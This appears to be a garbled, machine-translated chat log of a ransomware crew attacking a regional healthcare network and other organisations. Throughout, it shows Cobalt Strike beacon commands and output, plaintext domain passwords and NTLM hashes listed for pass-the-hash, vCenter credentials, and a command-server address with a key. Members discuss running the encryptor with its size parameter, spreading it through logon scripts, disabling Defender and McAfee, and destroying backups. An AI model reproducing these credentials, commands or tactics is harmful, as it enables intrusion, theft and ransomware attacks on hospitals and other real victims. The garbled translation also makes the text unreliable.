(platform: 500 version: 6.3 name: CFD01 domain: ORANGE_FACT) 10.109.1.21:445 (platform: 500 version: 6.3 name: TL02 domain: ORANGE_FACT) 10.100.20.15:445 (platform: 500 version: 6.3 name: OC40 domain: ORANGE_FACT) ``user8 add @user8 to the chat room I'm the only one here now) can I have slypad.com:443 who pass? there is a session, most likely goes to `CORPSFEAPP05 ` as will be turned on the VPN check the `CORP.TELEVISA.COM.MX\cguerrerobo Televisa *2020 ` did not have time to check the cress, turned off the VPN-as the other mount, which I did on the server does not roll? 
or he never came + putzakrepreshit hangs yesByla would not miss the sparrows.I confused with balya stopya see in the cob session from there hangsa why bother me and the extra light zakrepnu tell me thatThere is no time, valenok at the computer includes vpn for a couple of minutes. As soon as we jump I'll reporta only 1perekiruyte on the server somewherePulni plzodaZakrep weighs? -little if@tl2 @tl1 and at least some hashik unloaded ?VPN enabled for a short time.Here progress not much, looking for an accessible server that would hook up, unloaded Firefox now will look at the deadic, maybe any accesses will find#sccy-com #ballymoregroup-com and something else I'm not privy to. What's in the works today? I'll keep you posted on how it goes from here, most of the servers are off, the ones that aren't are encrypted...have you checked the old network? hi) everyone, did the deadic pull up, but otherwise no[ ](https://mediaeveryone.com/channel/general?msg=egNgG9m4nGZggDsk2) nothing ?[ ](https://mediaeveryone.com/channel/general?msg=5hJjTn62neuBcoHf4) intrigued... And an hour has passed alreadyNo fly sessions did not help in an hour, all together we will get together on a small bering about the next week but in general they may not need soonernae anything)on zakrepov .... a zakrepov? + updated the files in tours, there Detect 4/23 on the dynamics instead of 9/23started these two ways `` regsvr32 file.dll rundll32 file.dll, StartW ``Disassemble I have all x64? ok, 4 then, it's better to have in reserve in tv as well but just in case it's your only chance to clean the load 2 shellcoats that's it? i'll give you a couple more vpn's in work 2 pcs? all? send me a shellcoat i'll give it as an archive but i can clean it by hand at least by tulsam, dudes come by, but computers are not domain so it's hard to get there. i have dumped hashes tl2, maybe when will unload ...on sccy silence? i have a tv and user7 helps sccy in pcsb we troetools cleaned? 1 with tv and 1 with pcsb? 
the same as yesterday) who's working with what today?:space_invader:hi all hello tomorrow by 6 restful to tomorrowDo horses) user1poka off, alas there kerbs, you could have a shitload of ita farm is still off? add more @user1otleetela i did not take any unwanted action last 15 minutes before i died on ms17-010 empty beacon> shell net localgroup administrators [*] Tasked beacon to run: net localgroup administrators [+] host called home, sent: 60 bytes [+] received output: Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator dennadmin dennisadmin localadmin ORENCO\Domain Admins The command completed successfully. beacon> shell net group "Domain admins" /dom [*] Tasked beacon to run: net group "Domain admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain orenco.com. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- 0renco ADadmin ADAM_OrencoAD-LDS ADCS-CertSvc ADCS-NDESSvc ADCS-WebSvc bdehaven bmehrabian esherman ExchangeAdmin hodges JLyons jperez mark.dupuis SCCM01$ sdawson The command completed successfully. beacon> shell net group "Enterprise admins" /dom [*] Tasked beacon to run: net group "Enterprise admins" /dom [+] host called home, sent: 65 bytes [+] received output: The request will be processed at a domain controller for domain orenco.com. Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- 095 bmehrabian ExchangeAdmin hodges The command completed successfully. 
``tl2otuser9 I don't have it handy(( ask @tl1 he has an account there too can you give access to the service, which is similar to virustotal? Check dllkiok)) hello. It should ask @user3. I have not kept track of them - they change so often)) hello, and remind me the link to our forum, please take a mail, fs, social networks look more and you have looked at the technicians all? brutal did not give anything (brutalized esx looking for a web mordas to rub the backups there is movement? -[ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=X2EtTJvtHPYtbkq7a) @tl1 have you run into this? took a screenshot of the admin desktop there was an etp console open, he was just restoring No credits. He stole a cookie and then he logged in. 10.1.0.170 ``` because they go by ip https://10.1.0.170/web/bin/index.html and only one user tell me where you find it now how did you see it?) there is another backup system Rubrik not cloudy not a clue here ... you need to automatically generate all combinations with pass and cvr+special characters, the guy has passwords like - pass123 pass123@ passl23# and so on random password generator? you ask about a password manager? What's a tool that generates passwords based on a pattern i checked, but i couldn't find them. look at the sphere ... you did a scan of the network how did you find them? ie fucked up only in esx? what do you mean completely? i see there fs and everything is shifty there is available? if not you are wasting your time is vim server available? Cool2002! @#Jackson09! V8tundra! !@#monstrosity2002! crisp31015 cool2002 JbQp3Fjq9mUa EvaiKiO1! ``https://github.com/Arvanaghi/SessionGopher``` * Username : rthomas * Domain : MAIN * Password : !@monstrosity2002 ``2 what part was it? no, these are not in adiz* of them? didn't understand the question, for them?[ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=Ycb785mrfeQYmw9LH) some part for them? some in the domain were they in the domain? yes? 
forgot them?)`` crhsesxi20.main.crispregional.org crhsesxi21.main.crispregional.org crhsesxi22.main.crispregional.org crhsesxi23.main.crispregional.org crhsesxi24.main.crispregional.org crhsesxi25.main.crispregional.org crhsesxi26.main.crispregional.org crhsesxi27.main.crispregional.org `````` MAIN\Administrator cr1spy173 MAIN\Allscripts_Admin crisp1234 MAIN\AllscriptsSQL Cr1spy173 MAIN\htservice Hyp3rtap3 MAIN\meditech-admin meditech12 MAIN\meditech meditech12 MAIN\nodom Miranda22 MAIN\dragon Cr1spy173 MAIN\jwashburn1 Nestlr99 MAIN\pbodrey rocket48 MAIN\smaxwell retire17 MAIN\ashleys Ashley!23 MAIN\rlagrone goose2001 MAIN\spf_svcs cr1spy173 MAIN\helpdesk Crisp@123 MAIN\blove wingnut12# ``1.done.CRISPREGIONAL.ORG thank you bbbbok))) you go to 12 you can go satiitogo +4 hours on top of everything zbsagaSame went after the latch 1742 gbnet what did you do?the process went faster1742 gb or through ehei and then try to limit the size and run separately to the folder again check av and vindefmonitor this casebut in 3 hoursI'm trying to get on the rdp to the server from which you can go to the admin officeao, the file is 500 gb changed the extension of what?[ ](https://mediaeveryone.com/group/crispregional-org?msg=bgPCbwvFmfMwjop8L) kobadai access to the coba still check the aver to startParameter in the argument??[ ](https://mediaeveryone.com/group/crispregional-org?msg=j2fFkWHhYy2nrZtpa) inject, with the parameter E:\ -size 25 and then put dll again on the backpack admin maqafi suddenly turned on and before that the exe was ok? processes hangs on? see the maqafaa what is it? it is demolished start it throw the exe beacon> shell dir C:\ [*] Tasked beacon to run: dir C:\ [+] host called home, sent: 38 bytes [+] received output: Volume in drive C has no label. 
Volume Serial Number is 88D0-688E Directory of C:\ 01/22/2021 01:06 AM 1,558 .rnd.YHCWU 01/22/2021 01:06 AM 1,790 Dailly Backup_Subplan_1_20160715120154.txt.id-B4E852BA.[emailme@italymail.com].arena.YHCWU 01/22/2021 01:06 AM 14,885 eula_en.txt.YHCWU 12/30/2015 08:47 AM 66 install x64.bat 01/22/2021 01:06 AM 10,815 legal_notices.txt.txt.YHCWU 08/22/2013 10:52 AM PerfLogs 01/22/2021 01:07 AM Program Files 01/22/2021 01:07 AM Program Files (x86) 01/22/2021 01:06 AM 3,194 RakhniDecryptor.1.21.2.1_15.10.2017_23.13.34_log.txt.YHCWU 10/15/2017 10:13 PM 5,463,192 RakhniDecryptor.exe 01/22/2021 01:06 AM 930 readme.txt 01/22/2021 01:07 AM Users 01/22/2021 01:07 AM VBRCatalog 01/22/2021 01:07 AM VeeamBackup&Replication_9.5.0.1038.Update2 01/22/2021 01:07:07 AM 679,073,953 VeeamBackup&Replication_9.5.0.1038.Update2.zip.YHCWU 01/22/2021 01:07 AM 2,158,762,518 VeeamBackup&Replication_9.5.0.823.Update1.iso.YHCWU 01/22/2021 01:07 AM VeeamFLR 01/22/2021 01:07 AM 1,913 veeam_backup_perpetual_32_0.lic.YHCWU 01/21/2021 11:26 PM Windows 01/22/2021 01:07 AM 10,576 zabbix_agentd.conf.YHCWU 01/22/2021 01:07 AM 664,700 zabbix_agentd.log.YHCWU 01/22/2021 01:07 AM Zabbix_x64 13 File(s) 2,844,010,090 bytes 9 Dir(s) 20,071,145,472 bytes free ``or the exe file in the root of the drive dlli look at the root of the disk I can't answer you this srevak did user9 and all conversations will be about him I care about this server here? Where did you run the exe file? fuck+[ ](https://mediaeveryone.com/group/crispregional-org?msg=YHZuQdkuoSaaD7kQy) from here the 500gb file changed its extension? 
*{\] Tasked beacon to run: dir E:\ [+] host called home, sent: 38 bytes [+] received output: Volume in drive E is Backups Volume Serial Number is 1AB1-05F7 Directory of E:\ 01/22/2021 02:37 AM American HealthTech 01/22/2021 02:41 AM Cobian 01/22/2021 03:01 AM Corepoint 01/22/2021 03:01 AM Corepoint DB Cluster 01/22/2021 03:01 AM Deleted 3M CDIS Old 01/19/20/2021 08:42 PM Deleted Allscripts Pro 01/21/2021 01:01 PM Deleted FollowMyHealth 12/30/2020 02:46 PM Deleted IPS Servers 01/21/2021 12:05 PM Deleted Meditech MU Servers 01/21/2021 01:03 PM Deleted Meditech OlahPDFViewer 12/30/2020 02:24 PM Deleted Meditech Servers 12/30/2020 03:16 PM Deleted Old vCenter Servers 12/30/2020 01:42 PM Deleted Redoc 12/30/2020 03:29 PM IPeople Servers 10/15/2019 07:10 AM IT Infrastructure Servers 12/30/2020 12:36 PM Kronos 10/15/2019 08:14 AM Meditech Server Snapshots - 1 Time 05/12/2020 01:27 PM ProgramData 08/05/2018 09:07 PM Provation 01/22/2021 01:06 AM 930 readme.txt 05/15/2020 09:01 PM VeeamAgentUser6940465c-6f53-11e8-9c43-bc0000e00000 10/06/2016 09:00 AM VeeamConfigBackup 1 File(s) 930 bytes 21 Dir(s) 5,198,023,389,184 bytes free ``I'm interested in its total say and free spaceday dir E:\ Pure bullshit! But there is clearly more said 30 min = 1tbrealistically a long time so, you have backups on the wine server and there you have a session? I do not understand you, I am on this PC) Where do I take it? Ie you also ran the build there? disk with backups attached or notbear> shell net use [*] Tasked beacon to run: net use [+] host called home, sent: 38 bytes [+] received output: New connections will be remembered. There are no entries in the list. It shows the attached disks see if there is no 2 TB Voz can be attached somewhere, I did not do it.The disk is attached? how much is the total size occupied? It goes on a small size there is movement? if not, let's run with -size25 or stands in place there is movement on the files? 
-size[10/15/20/25/30/35/40/45/50/60/70/80] This parameter defines how much % of the file will be encrypted (by default 50%), the file is encrypted in different places in chunks. In this case, the database is encrypted at 100%, the files in the vm at 20% regardless of the value of the parameter.there close and all day Saturday bye)and Saturday will be finished tomorrow at work time #ballymoregroup-com weekend is the ssk?)but the weekend will be freemax at 9[ ](https://mediaeveryone.com/group/crispregional-org?msg=G9La729RHc5vft2wr) can be later? sleep 6 hours then the rest of the houseI will stay for how long so come later and 8 + H for those who stay8 for everyone today? how late? so who stays tonight? so whoever stays tonight will just call to check, there's no need for everyone to stay home the rest can go home the main thing is that the syntax is correct yes, with that, but I think it should work faster with 15 give me a brainstorm)you ran it yourself then I don't know I ran it with "-size 15 e:\" from the neighbor's one is the syntax correct? no files are not changed? does it still have 500gb files on the first folder? is there a live process hanging? are the folders not fully encrypted?to gpd 20-2000gb files and in these folders less than half of the files half of the folders are only small files so far on the second passed 1 disk how many files passed on the backups? das logonscripts finished? on wine servers for example cut off) just then the point of cutting it) and polozak throwing out? i just see that gpupdate is still hanging on the user it means he did not accept the update and windef is still on if you force it within 5 minutes to ask about windef it's not like it's turned off or something. 
when you force a gpapdate, it gives the user an alert that the update is applied after it will exit8 tbhad to wait for backups there are 160 servers in hell alive 99 closed 99 1,550 armies by hell 479 alive we unshared the disks, unshared the exe, put it in the logon copy and start exe the center\nasys have been wiped out backups in progress `````` NOVANET `````` TRINISYSQA-DB RINISYSQA-APP `````` CRRHPOMC4 PYXIS-CCE-TEST2 NTOPCERNER PYXIS-CCE-TEST 3MCDISTEST NOVANET IT-ADMIN ATCOMM MEDMANAGER CINTAS IT-INFO ``Then we're ready to run it? Tell me when you're ready Don't run it yetDiscuss the processes\kil, just run it rub one nasa what's left? have you got many left? have you not started yet? ``` Trinisys-A3 Trinisys-A4 Trinisys-A5 Trinisys-A6 Trinisys-A7 Trinisys-A8 `````` CRANEWARE NTOPng OMNICELLOld2 `````` itunitynas.main.crispregional.org NAS zamakat \backup, `````` CorepointMSFTCluster CorepointSQL CRANEWARE crhs-security CRHSVIEWSECSVR DIV5 MTSCA NTOPng OMNICELLOld2 PYXIS-CCE-PROD Trinisys-A3 Trinisys-A4 Trinisys-A5 Trinisys-A6 Trinisys-A7 Trinisys-A8 VISONEX ``did not attract ``` 10.1.20.250 10.1.20.197 10.1.20.124 10.1.0.40 10.1.20.127 10.1.20.198 10.1.20.162 10.1.0.80 ``In that case you format it if they are files of the current machine then do not delete only snappsDo you have virtual machine disks are files? 
pth MAIN\Administrator e25c3e50d7638936c2f2ee77eebb1f24 cr1spy173 pth MAIN\Allscripts_Admin 19a1901a003621a6e1abd6edb0e7cf0b pth MAIN\allscripts_services 19512cc1b7dc97e7e302f34a2245cabe pth MAIN\AllscriptsSQL 6a8e1d103a88ea3dc2a012d34e544e99 pth MAIN\blove 7bef985313e414bb847c4dcd6c7c6826 wingnut12# pth MAIN\htservice 0cf803b54e919bc11e75c48ea596eb92 pth MAIN\meditech-admin d28f5c2d3ea915737812fbdeb4ea4c79 pth MAIN\meditech d28f5c2d3ea915737812fbdeb4ea4c79 pth MAIN\nodom 9255c608109b78b60fc048e84b7926aa pth MAIN\rthomas 6f0b655dac0046d92eb3fec69ba6aece pth MAIN\tcoppedge 06a1064c70fa0e250e81eddc4f046dacc pth MAIN\amhs-admin 443abd60ece7cfb885a54fd2ba35ffcb pth MAIN\dragon 6a8e1d103a88ea3dc2a012d34e544e99 pth MAIN/jwashburn1 fc98da86ebcc76100a0e62c22d0bd2ca pth MAIN\pbodrey 300249ae0b204470a430295a2dc30a07 pth MAIN\smaxwell 87a628063ebb1e790221800f8ed76d16 pth MAIN\ashleys 4f3d00492c0d5219ba173c26fc1694ef pth MAIN\MBAM-RW-SVC 04a88994cf7db5a0e8730e4effd73742 pth MAIN\mhiers 3b3000484afdc685a779399548e76d9e pth MAIN\rlagrone 438eb0f2356b0f16719a307919e583c6 pth MAIN\spf_svcs e25c3e50d7638936c2f2ee77eebb1f24 pth MAIN\helpdesk 0219040d969400d4253ff874683fd9f8 `````` https://crhsvcenter7.main.crispregional.org/ui/ Administrator@main.crispregional.org cr1spy173 ``don't forget to drop the process of whining on the servers, etc@user9 coordinate on the networkn hope vindef not cut, let's so can prescribe in the logon script kst ports 7/9 are also closed everywhere, it seems standard for vol``(D)*FY&(GSDGUVIIYSDOF*^RS*GUTSBG (wakemeonlan not see switched off compounds, but it also falls off the problem is that the jump generates an echo and we have no signature certificates in cobalt may react to it and the old one was not there and the old one was deleted? if anything, EXACTLY the script was imported) on the rdp I sit where the jump did not see the notefna jump burned but defender should not stalid ... did not steam today at least not yet) aha seriously? 
should be cleaner everything is very relative defender steam it) how long does it take for you to reach the jmp?) it works? >* Beacon's 'jump psexec' and 'jump psexec64' commands[ ](https://mediaeveryone.com/group/crispregional-org?msg=ALXZw7dvyA8RBwDCf) yes) or it generates loads itself when you jump and so?[ ](https://mediaeveryone.com/group/crispregional-org?msg=KhnLLye6nY4zyhk2C) is it? yes? how to generate? everything? lol))you have to start a new one lol) no, you have to start a new cobalt and not take a script from it and add it to the old one? you have to add it to the script manager[ ](https://mediaeveryone.com/group/crispregional-org?msg=c5aken5Ld6PtdbKDC) and you can't use it? @user9 because you start it with the old startup, not through the hooke me ok In the package in the folder Cobalt42_v2/Toolkits/artifact/brooks-artifact-kit/ is artifact.cna which must be imported into cobalt to generate internal native loads and staged loads to run. ``Booted so I wrote 15 = 0da and 13 ok just 13 is not as easy to install as 15``(S)*YD(F&T*^SDUYGfDSI&%FUHIG^7` if 15 is bullshit) yes15jdk13 installing the right Java : sudo add-apt-repository ppa:linuxuprising/java sudo apt install oracle-java15-installer java -version java version "15.0.1" 2020-10-20 Java(TM) SE Runtime Environment (build 15.0.1+9-18) Java HotSpot(TM) 64-Bit Server VM (build 15.0.1+9-18, mixed mode, sharing) ``Upgrade only from Java 13. Don't be so quick to unshackle your flesh, let's update yours pure and pristine`` 206.221.188.106:63254 edbDkh6n9sCjfeYJLyFby0q5tKCzuscVSnj `````` 206.221.188.106 ``` any coba creeds left? can't find it any cleaner than our dlls from tulspanel``. 
Artifact Kit is used in the following cases : * Attacks -> Packages -> Windows Executable * Attacks -> Packages -> Windows Executable (S) * Attacks -> Web Drive-by -> Scripted Web Delivery (bitsadmin and exe) * Beacon's 'elevate svc-exe' command * Beacon's 'jump psexec' and 'jump psexec64' commands ``it's artifact kitego windef not trett e now you can go through jump) what do you mean it cleans? are we going to do it now? we have a coba update that cleans jump and also coba here to work start with servers, dk last but not least@all pull all servers here anyway it's about ARM If you drop AV then so you can turn off windef and unpack exe then work nope no idea but it seems like we would have found it disconnect the policy and form did not find? at least one of the monitors stand you two next to each other will sit in the same window or what? ok@user7 help with AV and we will close only some policies are not available, i tried under different admins just disconnect there? in the policies, there are a million there found?look for disconnect but do not disable it then all ok+ in other folders machine with the tag server144 in the folder servers100+ clearly there should be how many servers there at least approximately or type of servera what filters do you need? look filters you went there or screenshots?[ ](https://mediaeveryone.com/group/crispregional-org?msg=zNs3B7SRGt4HC7Cu8) how many I do not see, but I see that there are many, probably all at least all servers and give me a shellcode are all pk's running there? no, i think all of them) here's a freshly built dll then + and there processes die in 30 sec? not all servers i checked, where i looked - they knock in it-admin, this server is macaffi cloud? and where they knock? 
yes everywhere is macaffi, just somewhere direct client and where some scanners check not through edr_q51B↩zeguya especially in the console av not looked into no one has downloaded the dll, i will check if i have it everywhere, can't i download the build? interesting fact you threw in) by the way, the session dies in 30 seconds freshly built dll i'm not sure if all servers are av managed from konosli makaffi 20 mina should be reddish on the same sabinet? on the net how? on the dedik was a few komponu were yellow, became green) do not like it i think) WakeMeOnLan I ran a fordcast on the deck, there were a few computers, they kinda woke up and what was the wol and how did you test?[ ](https://mediaeveryone.com/group/crispregional-org?msg=bvAFBp2D3sBPThK7z) I looked there) they're always ready wol tested, it seems to work on rdpodgotovil WOL software, shredders, batniks, etc? user4user8user7user3 then work but there is nothing) there is an option edit cloud from the top left like a menu item look lagia unleashed10.1.20.183 MAIN\blove wingnut12# 206.221.188.106:52786 give me access and sostam what do we have? the first 3 items on the left look at the settings) now their computers are off in bludhoudn two computers with active sessions YES, in addition to dkne, you need to reserver admin, well only ``` TCP 0.0.0.0:6169 0.0.0.0:0 LISTENING 4676 and ``and also, the backup process does not always keep the connection open+and the pid is the same? on the pid, well it is not there, so it does not knock) there is no processa as you understood? 
Active Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:111 0.0.0.0:0 LISTENING 2304 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 756 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:1063 0.0.0.0:0 LISTENING 2304 TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 1644 TCP 0.0.0.0:2049 0.0.0.0:0 LISTENING 2304 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 3160 TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:6160 0.0.0.0:0 LISTENING 1900 TCP 0.0.0.0:6161 0.0.0.0:0 LISTENING 2304 TCP 0.0.0.0:6162 0.0.0.0:0 LISTENING 2352 TCP 0.0.0.0:6169 0.0.0.0:0 LISTENING 4676 TCP 0.0.0.0:6170 0.0.0.0:0 LISTENING 5300 TCP 0.0.0.0:6172 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:6190 0.0.0.0:0 LISTENING 2392 TCP 0.0.0.0:6210 0.0.0.0:0 LISTENING 2176 TCP 0.0.0.0:6290 0.0.0.0:0 LISTENING 2392 TCP 0.0.0.0:8081 0.0.0.0:0 LISTENING 1232 TCP 0.0.0.0:9380 0.0.0.0:0 LISTENING 1924 TCP 0.0.0.0:9381 0.0.0.0:0 LISTENING 1924 TCP 0.0.0.0:9392 0.0.0.0:0 LISTENING 3316 TCP 0.0.0.0:9393 0.0.0.0:0 LISTENING 4276 TCP 0.0.0.0:9396 0.0.0.0:0 LISTENING 3680 TCP 0.0.0.0:9401 0.0.0.0:0 LISTENING 3316 TCP 0.0.0.0:9501 0.0.0.0:0 LISTENING 3692 TCP 0.0.0.0:10001 0.0.0.0:0 LISTENING 3316 TCP 0.0.0.0:10002 0.0.0.0:0 LISTENING 3316 TCP 0.0.0.0:10003 0.0.0.0:0 LISTENING 4676 TCP 0.0.0.0:10005 0.0.0.0:0 LISTENING 3316 TCP 0.0.0.0:10006 0.0.0.0:0 LISTENING 3316 TCP 0.0.0.0:10050 0.0.0.0:0 LISTENING 1848 TCP 0.0.0.0:11731 0.0.0.0:0 LISTENING 1900 TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 540 TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 864 TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 888 TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 640 TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 640 TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING 1036 TCP 0.0.0.0:49203 0.0.0.0:0 LISTENING 632 TCP 0.0.0.0:49204 0.0.0.0:0 LISTENING 3192 TCP 10.1.20.183:139 0.0.0.0:0 LISTENING 4 TCP 10.1.20.183:301 10.10.1.69:2049 ESTABLISHED 1900 TCP 10.1.20.183:302 10.10.1.46:2049 ESTABLISHED 1900 TCP 10.1.20.183:303 10.10.1.43:2049 ESTABLISHED 1900 TCP 
10.1.20.183:305 10.10.1.43:2049 ESTABLISHED 1900 TCP 10.1.20.183:445 10.1.20.113:65195 ESTABLISHED 4 TCP 10.1.20.183:3389 192.168.9.179:55814 ESTABLISHED 3160 TCP 10.1.20.183:9392 10.1.20.183:60589 ESTABLISHED 3316 TCP 10.1.20.183:9396 192.168.9.179:58127 ESTABLISHED 3680 TCP 10.1.20.183:9396 192.168.9.179:58869 ESTABLISHED 3680 TCP 10.1.20.183:10050 10.1.200.69:32768 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:32786 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:32880 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:32882 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:32972 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33010 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33036 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33246 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33266 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33464 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33764 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:33942 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34178 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34238 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34372 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34542 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34682 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34696 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:34866 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:35004 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:35090 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:35206 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:35294 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:49650 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:49782 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:49866 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50016 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50076 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50188 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50250 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50416 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50538 TIME_WAIT 0 TCP 
10.1.20.183:10050 10.1.200.69:50652 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50836 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50958 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:50970 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51108 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51270 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51410 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51518 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51584 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51706 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:51852 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52014 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52122 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52284 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52372 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52536 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52654 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52804 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52836 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52938 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:52996 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53002 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53094 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53118 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53192 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53374 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53384 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53482 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53592 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53744 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53858 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53944 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:53958 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54060 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54074 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54118 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54170 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54262 TIME_WAIT 0 TCP 10.1.20.183:10050 
10.1.200.69:54378 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54532 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54626 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:54988 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55106 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55296 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55474 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55610 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55682 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55780 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:55974 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56038 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56156 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56262 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56344 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56504 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56610 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56716 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56778 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:56912 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57018 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57162 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57262 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57396 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57434 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57606 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57746 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57820 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:57944 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58116 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58248 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58334 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58466 TIME_WAIT 0 TCP 10.1.20.183:10050 10.1.200.69:58594 TIME_WAIT 0 TCP 10.1.20.183:10050 